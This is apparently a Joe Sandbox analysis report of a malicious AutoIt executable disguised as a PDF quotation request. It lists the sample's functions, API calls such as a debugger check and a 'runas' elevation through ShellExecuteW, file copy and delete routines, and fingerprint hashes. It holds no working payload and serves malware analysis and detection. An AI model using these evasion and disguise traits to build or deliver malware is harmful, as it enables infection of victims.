                                                                      • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                      • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                    • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                      • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                      • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                      • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                      • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                      • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                    • String ID: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                    • API String ID: 2495805114-1127259613
                                                                    • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                    • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                    • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                    • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                    Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2087 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2096 40e582-40e583 2087->2096 2097 427674-427679 2087->2097 2100 40e585-40e596 2096->2100 2101 40e5ba-40e5cb call 40ef60 2096->2101 2098 427683-427686 2097->2098 2099 42767b-427681 2097->2099 2103 427693-427696 2098->2103 2104 427688-427691 2098->2104 2102 4276b4-4276be 2099->2102 2105 427625-427629 2100->2105 2106 40e59c-40e59f 2100->2106 2118 40e5ec-40e60c 2101->2118 2119 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2101->2119 2120 4276c6-4276ca GetSystemInfo 2102->2120 2103->2102 2110 427698-4276a8 2103->2110 2104->2102 2112 427636-427640 2105->2112 2113 42762b-427631 2105->2113 2108 40e5a5-40e5ae 2106->2108 2109 427654-427657 2106->2109 2114 40e5b4 2108->2114 2115 427645-42764f 2108->2115 2109->2101 2121 42765d-42766f 2109->2121 2116 4276b0 2110->2116 2117 4276aa-4276ae 2110->2117 2112->2101 2113->2101 2114->2101 2115->2101 2116->2102 2117->2102 2122 40e612-40e623 call 40efd0 2118->2122 2123 4276d5-4276df GetSystemInfo 2118->2123 2119->2118 2131 40e5e8 2119->2131 2120->2123 2121->2101 2122->2120 2128 40e629-40e63f call 40ef90 GetNativeSystemInfo 2122->2128 2133 40e641-40e642 FreeLibrary 2128->2133 2134 40e644-40e651 2128->2134 2131->2118 2133->2134 2135 40e653-40e654 FreeLibrary 2134->2135 2136 40e656-40e65d 2134->2136 2135->2136
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                    • String ID: 0SH
                                                                    • API String ID: 3363477735-851180471
                                                                    • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                    • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                    • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                    • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                    Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: IsThemeActive$uxtheme.dll
                                                                    • API String ID: 2574300362-3542929980
                                                                    • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                    • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                    • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                    • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                    Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                                                    • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                    • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                    • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                    • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                    Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                    • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchSleepTranslate
                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                    • API String ID: 1762048999-758534266
                                                                    • Opcode ID: dddd67931d801353eb1dd189a0ac0c44ab293870bf309cdaaa327df0de120e66
                                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                    • Opcode Fuzzy Hash: dddd67931d801353eb1dd189a0ac0c44ab293870bf309cdaaa327df0de120e66
                                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                    Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1230 452ac7-452b53 call 422240 call 442c5a call 4150d1 call 41313c 1239 452c30-452c3a call 452719 1230->1239 1240 452b59-452b6a call 452719 1230->1240 1244 452c3f-452c41 1239->1244 1245 452b6c-452b77 1240->1245 1246 452b7a-452c2e call 413a0e call 411567 call 411536 call 413a0e call 411536 * 2 1240->1246 1244->1245 1247 452c47-452d18 call 414d04 * 8 call 431e1f call 4149c2 1244->1247 1246->1247 1280 452d28-452d43 call 442bb4 1247->1280 1281 452d1a-452d25 1247->1281 1284 452de2-452df7 call 414a46 1280->1284 1285 452d49 1280->1285 1291 452e15-452e1a 1284->1291 1292 452df9-452e12 DeleteFileW 1284->1292 1287 452d51-452d59 1285->1287 1289 452d5f 1287->1289 1290 452d5b-452d5d 1287->1290 1293 452d64-452d86 call 414d04 1289->1293 1290->1293 1294 452ea6-452ebb CopyFileW 1291->1294 1295 452e20-452e81 call 431e9e call 431e71 call 44b1a9 1291->1295 1303 452da9-452dcc call 432229 call 4142b6 1293->1303 1304 452d88-452da7 call 442c29 1293->1304 1297 452ebd-452ed6 DeleteFileW 1294->1297 1298 452ed9-452ef5 DeleteFileW call 431ddb 1294->1298 1314 452e86-452e88 1295->1314 1306 452efa-452f02 1298->1306 1315 452dd1-452ddc 1303->1315 1304->1303 1314->1298 1316 452e8a-452ea3 DeleteFileW 1314->1316 1315->1284 1317 452d4b-452d4d 1315->1317 1317->1287
                                                                    APIs
                                                                      • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                    • _fseek.LIBCMT ref: 00452B3B
                                                                    • __wsplitpath.LIBCMT ref: 00452B9B
                                                                    • _wcscpy.LIBCMT ref: 00452BB0
                                                                    • _wcscat.LIBCMT ref: 00452BC5
                                                                    • __wsplitpath.LIBCMT ref: 00452BEF
                                                                    • _wcscat.LIBCMT ref: 00452C07
                                                                    • _wcscat.LIBCMT ref: 00452C1C
                                                                    • __fread_nolock.LIBCMT ref: 00452C53
                                                                    • __fread_nolock.LIBCMT ref: 00452C64
                                                                    • __fread_nolock.LIBCMT ref: 00452C83
                                                                    • __fread_nolock.LIBCMT ref: 00452C94
                                                                    • __fread_nolock.LIBCMT ref: 00452CB5
                                                                    • __fread_nolock.LIBCMT ref: 00452CC6
                                                                    • __fread_nolock.LIBCMT ref: 00452CD7
                                                                    • __fread_nolock.LIBCMT ref: 00452CE8
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                    • __fread_nolock.LIBCMT ref: 00452D78
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                    • String ID:
                                                                    • API String ID: 2054058615-0
                                                                    • Opcode ID: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                                    • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                    • Opcode Fuzzy Hash: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                                    • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                    Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1318 46e1a6-46e1ba 1319 46e1c0-46e1cd call 40c650 1318->1319 1320 46e45e 1318->1320 1319->1320 1325 46e1d3-46e1d7 1319->1325 1322 46e462-46e47d call 4533eb call 445ae0 1320->1322 1329 46e483-46e48a 1322->1329 1330 46e1dc-46e1e3 1322->1330 1325->1322 1331 46e2e7-46e2fa call 40f760 1330->1331 1332 46e1e9-46e214 call 45340c call 411567 call 413e1f 1330->1332 1338 46e2fc-46e30b call 403cd0 1331->1338 1339 46e30d-46e343 call 45340c call 413a0e 1331->1339 1351 46e216-46e255 call 411567 call 411536 call 45340c call 411536 1332->1351 1352 46e258-46e282 call 45340c call 411567 call 433998 1332->1352 1346 46e2c8-46e2e4 call 408f40 1338->1346 1354 46e374-46e3fa call 411567 call 411536 * 3 call 45340c call 433784 call 4339fa 1339->1354 1355 46e345-46e34d 1339->1355 1351->1352 1380 46e284-46e29c call 4111c1 1352->1380 1381 46e29e-46e2c2 call 45340c call 44bd27 1352->1381 1397 46e403-46e405 1354->1397 1398 46e3fc-46e3ff 1354->1398 1355->1354 1359 46e34f-46e371 call 411567 * 2 1355->1359 1359->1354 1380->1346 1380->1381 1381->1329 1381->1346 1399 46e407-46e41e call 45340c call 452ac7 1397->1399 1401 46e436-46e444 call 408f40 1397->1401 1398->1399 1400 46e401 1398->1400 1408 46e423-46e425 1399->1408 1400->1401 1407 46e44b-46e45b call 431e58 1401->1407 1408->1407 1410 46e427-46e431 call 403cd0 1408->1410 1410->1401
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                    • API String ID: 0-1896584978
                                                                    • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                    • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                    Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,00000104,?), ref: 00401F4C
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • __wcsicoll.LIBCMT ref: 00402007
                                                                    • __wcsicoll.LIBCMT ref: 0040201D
                                                                    • __wcsicoll.LIBCMT ref: 00402033
                                                                      • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                    • __wcsicoll.LIBCMT ref: 00402049
                                                                    • _wcscpy.LIBCMT ref: 0040207C
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,00000104), ref: 00428B5B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe$CMDLINE$CMDLINERAW
                                                                    • API String ID: 3948761352-2045402639
                                                                    • Opcode ID: f22f4b8f7852214b0539a738b1855063d63c0007121df8553cfd6bf2c849bd2e
                                                                    • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                    • Opcode Fuzzy Hash: f22f4b8f7852214b0539a738b1855063d63c0007121df8553cfd6bf2c849bd2e
                                                                    • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                    Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                                    • String ID: D)E$D)E$FILE
                                                                    • API String ID: 3888824918-361185794
                                                                    • Opcode ID: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                                    • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                    • Opcode Fuzzy Hash: 013d3c16b5c27b8fe9bf46a980aed5baba8dd4ce194e3a208a92420200829254
                                                                    • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                    Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                    • __wsplitpath.LIBCMT ref: 0040E41C
                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                    • _wcsncat.LIBCMT ref: 0040E433
                                                                    • __wmakepath.LIBCMT ref: 0040E44F
                                                                      • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    • _wcscpy.LIBCMT ref: 0040E487
                                                                      • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                    • _wcscat.LIBCMT ref: 00427541
                                                                    • _wcslen.LIBCMT ref: 00427551
                                                                    • _wcslen.LIBCMT ref: 00427562
                                                                    • _wcscat.LIBCMT ref: 0042757C
                                                                    • _wcsncpy.LIBCMT ref: 004275BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
